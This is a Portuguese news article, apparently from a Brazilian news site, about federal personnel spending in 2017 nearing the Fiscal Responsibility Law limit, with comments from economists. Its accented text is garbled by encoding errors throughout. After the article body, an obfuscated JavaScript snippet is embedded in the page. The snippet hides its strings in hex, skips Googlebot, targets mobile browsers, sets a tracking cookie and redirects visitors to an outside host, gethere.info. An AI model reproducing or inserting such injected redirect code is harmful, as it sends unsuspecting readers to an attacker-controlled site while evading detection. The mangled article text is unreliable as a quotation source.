Home » Brasil » Governo » Gasto do governo com pessoal em 2017 se aproxima do teto e A� o maior desde a criaA�A?o da Lei de Responsabilidade Fiscal

Gasto do governo com pessoal em 2017 se aproxima do teto e A� o maior desde a criaA�A?o da Lei de Responsabilidade Fiscal

Segundo o governo, despesa com pessoal somou 41,8% das receitas correntes lA�quidas no ano passado. Em vigor desde 2000, LRF limita esse gasto a 50% das receitas.

Os gastos do governo com pessoal vA?m crescendo nos A?ltimos anos e se aproximam do limite fixado na Lei de Responsabilidade Fiscal (LRF), apontam dados do MinistA�rio do Planejamento.

Essas despesas da UniA?o atingiram, em 2017,A�41,8% da chamada receita corrente lA�quida (RCL), que A� a soma das receitas tributA?rias de um governo, descontados os valores das transferA?ncias constitucionais. Trata-se do percentual mais alto desde a criaA�A?o da LRF, em 2000. Para se ter uma ideia, em 2012 esse gasto equivalia a 30% da RCL (veja grA?fico abaixo).

A Lei de Responsabilidade fiscal estabelece que a UniA?o nA?o pode gastar com pessoal mais do que 50% da RCL. Se esse limite for atingido, a lei prevA? uma sA�rie restriA�A�es e medidas, como a proibiA�A?o de reajuste de salA?rios e atA� a demissA?o de servidores.

O gasto com pessoal A� aquele feito pelo governo para o pagamento de salA?rios e de benefA�cios previdenciA?rios, como aposentadorias, a servidores pA?blicos.

Especialistas A�apontam que esse aumento estA? relacionado com a crise econA?mica, que levou A� queda na arrecadaA�A?o do governo, mas que os indicadores devem melhor daqui pra frente,A�com o fim da recessA?o. (leia mais abaixo)

Em 2017, o gasto com pessoal do governo federal foi deA�R$ 288,773 bilhA�es. Para este ano, a previsA?o A� de que fique em R$ 302,55 bilhA�es. E a estimativa do governo A� que o valor chegue a R$ 335,338 bilhA�es em 2021.

Se considerada toda a sA�rie histA?ria do Planejamento, a depesa do ano passado, que atingiu 41,8% da Receita Corrente Liquida, tambA�m A� o maior desde 1998 (42,7%), ou seja, em 19 anos.

Embora seja o maior desde a criaA�A?o da Lei de Responsabilidade Fiscal na proporA�A?o com a receita corrente lA�quida, o gasto jA? foi mais alto quando comparado com o Produto Interno Bruto (PIB). No ano passado, somou 4,3% do PIB, o mais alto desde 2009 (quando foi de 4,6% do PIB).

Governo tenta conter avanA�o

Para tentar controlar essas despesas, o governo jA? anunciou algumas providA?ncias, como o inA�cio de umA�Plano de DemissA?o VoluntA?ria (PDV) para servidores pA?blicos, a possibilidade de eles requisitarem licenA�a sem remuneraA�A?o por atA� trA?s anos consecutivos (prorrogA?veis por igual perA�odo), e de optarem por uma jornada reduzida de trabalho, com corte proporcional do salA?rio.

AlA�m disso, o governo federal passou a registringir novas contrataA�A�es. A realizaA�A?o de concursos pA?blicos, que estava suspensa desde 2016 em razA?o da piora nas contas pA?blicas, estA? sendo retomada neste ano, masA�apenas para preencher vagas abertas pela saA�da servidores.

Na divulgaA�A?o do projeto de Lei de Diretrizes OrA�amentA?rias (PLDO) de 2019, na A?ltima quinta-feira (12), o ministro do Planejamento, Esteves Colnago, afirmou que a realizaA�A?o de novos concursos continuarA?, no prA?ximo ano, limitada A� “vacA?ncia” (servidores que deixaram o setor pA?blico) no ano de 2017.

“Na proposta da LOA [lei orA�amentA?ria anual, a ser encaminhada ao Congresso Nacional atA� agosto deste ano], a gente vai ver qual A� o espaA�o orA�amentA?rio que tem efetivamente para fazer concursos. Na LOA, deve ter um limite menor do que esse [vacA?ncia em 2017]”, declarou Colnago.

NA?meros do governo mostram que, atA� 2027, quase 40% dos servidores pA?blicos do Executivo Federal, cerca de 216 mil trabalhadores,A�devem se aposentar.

Entretanto, de acordo com integrantes da A?rea econA?mica, nem todas as aposentadorias serA?o repostas com novas contrataA�A�es por conta do teto de gastos e, tambA�m, devido ao uso de novas tecnologias – que diminuem a necessidade de contrataA�A�es. O governo estA? desenvolvendo um sistema informatizado para dimensionar a necessidade de servidores.

Crise e crescimento da folha salarial

O economista JosA� Roberto Afonso, pesquisador do IBRE/FGV e professor do IDP, foi coordenador da equipe tA�cnica que preparou o projeto do governo da LRF em 1998 e 1999. De acordo com ele, o aumento do gastos com pessoal nos A?ltimos anos, em relaA�A?o A� receita corrente lA�quida, estA? relacionado ao forte crescimento da folha salarial do governo, aliado A� uma queda da arrecadaA�A?o – fruto da recessA?o econA?mica.

“A evoluA�A?o passada A� em boa parte compreensA�vel. O problema foi o governo nA?o acreditar em sua prA?pria polA�tica econA?mica, pois, diante da expectativa de queda de inflaA�A?o, concedeu reajustes salariais expressivos”, declarou.

Ele disse, porA�m, que esse cenA?rio nA?o preocupa pois,A�com fim da recessA?o, a arrecadaA�A?o do governo deve melhorar e, a relaA�A?o entre o gasto com pessoal e a RCL, cair . AlA�m disso, apontou ele, o governo nA?o deve “repetir o erro de conceder aumentos salariais muito expressivos” aos servidores.

Afonso tambA�m recomendou que se regulamente parte da ConstituiA�A?o que prevA? avaliaA�A?o de servidores e demissA?o dos reprovados, alA�m de aumento da alA�quota previdenciA?ria do funcionalismo.

O especialista em contas pA?blicas, Raul Velloso, concorda que o forte aumento das despesas com pessoal, em relaA�A?o A� receita corrente lA�quida, estA? relacionada com a queda da arrecadaA�A?o do governo e que esse indicador tende a parar de piorar e evoluir para um nA?mero “que pode nA?o ser complicado” com a retomada do crescimento econA?mico.

“Dentro do gasto com pessoal, inclui gastos com aposentados, que tA?m de ter um tratamento em separado. Ao incluir o gasto com aposentados, mistura com a contrataA�A?o um problema que nA?o tem nada a ver com a gestA?o de pessoal, e que estA? sendo alvo de tentativas de ajustamento”, disse ele, se referindo A� proposta do governo para a PrevidA?ncia, que inclui mudanA�as nas aposentadorias dos servidores pA?blicos.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Publicação: Redação Brasil (m)
Tags

Publicações Similares

Login

Perdeu sua senha?